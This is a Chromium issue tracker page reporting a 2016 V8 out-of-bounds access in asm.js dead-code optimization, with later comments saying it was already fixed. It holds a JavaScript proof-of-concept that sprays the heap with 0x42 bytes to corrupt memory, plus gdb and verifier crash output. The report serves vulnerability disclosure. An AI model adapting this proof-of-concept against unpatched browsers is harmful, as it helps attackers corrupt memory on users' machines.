Issue metadata
Sign in to add a comment
|
Security: v8 OOB access when optimizing in asm.js
Reported by
cwhan.t...@gmail.com,
Jul 21 2016
|
||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
In asm.js, when a dead code creates an array with no arguments,
early optimization phase makes a bad node that has a mismatch
between total and actual # of node inputs. Thus, an uninitialized
element is accessed over the boundary.
VERSION
Chrome 5.2.361.43 (stable)
V8 5.2.361.43 (32 bit)
REPRODUCTION CASE
===================================================
function myGC() {
for(var i=0;i<((1024 * 1024)/0x10);i++)
var a = new String();
}
go = (function(stdlib, foreign, heap){
"use asm";
var ff = Array;
var Int32ArrayView = new stdlib.Int32Array(heap);
function f() {
var arr = new Array(1024);
for (var i=0; i<1000; i++)
arr.push(new stdlib.Uint8Array(1024).fill(0x42)); // memory corrupting
local = ff(); // <-------------------- This makes a crash
return Int32ArrayView[0];
}
return f;
})(this, {}, new ArrayBuffer(4096));
for (var i=0; i<400; i++) {
myGC();
go();
}
================================================
$ gdb -q --args ../../../v8_norm/out/ia32.release/d8 c3.js
Reading symbols from ../../../v8_norm/out/ia32.release/d8...(no debugging symbols found)...done.
(gdb) r
...
Program received signal SIGSEGV, Segmentation fault.
0x085ab1cc in v8::internal::compiler::DeadCodeElimination::Reduce(v8::internal::compiler::Node*) ()
(gdb) x/i $pc
=> 0x85ab1cc <_ZN2v88internal8compiler19DeadCodeElimination6ReduceEPNS1_4NodeE+92>: mov ecx,DWORD PTR [eax]
(gdb) i r eax
eax 0x42424242 1111638594
--------------------------------------------
$ ../../../v8_norm/out/ia32.debug/d8 c3.js
#
# Fatal error in ../src/compiler/verifier.cc, line 1317
# Check failed: OperatorProperties::GetTotalInputCount(node->op()) == node->InputCount() (9 vs. 8).
#
==== C stack trace ===============================
1: V8_Fatal
2: v8::internal::compiler::Verifier::VerifyNode(v8::internal::compiler::Node*)
3: v8::internal::compiler::NodeProperties::ChangeOp(v8::internal::compiler::Node*, v8::internal::compiler::Operator const*)
4: v8::internal::compiler::JSGenericLowering::LowerJSCreateArray(v8::internal::compiler::Node*)
5: v8::internal::compiler::JSGenericLowering::Reduce(v8::internal::compiler::Node*)
6: v8::internal::compiler::GraphReducer::Reduce(v8::internal::compiler::Node*)
7: v8::internal::compiler::GraphReducer::ReduceTop()
8: v8::internal::compiler::GraphReducer::ReduceNode(v8::internal::compiler::Node*)
...
,
Jul 22 2016
,
Jul 22 2016
,
Jul 22 2016
Looks like mvstanton@ fixed this with https://codereview.chromium.org/2127713003
,
Jul 22 2016
I cannot reproduce and it appears this was fixed. If the reporter can reproduce on a latest checkout of V8, please re-send this bug with additional instructions to reproduce. Thank you.
,
Oct 29 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by kerrnel@chromium.org
, Jul 21 2016Owner: bmeu...@chromium.org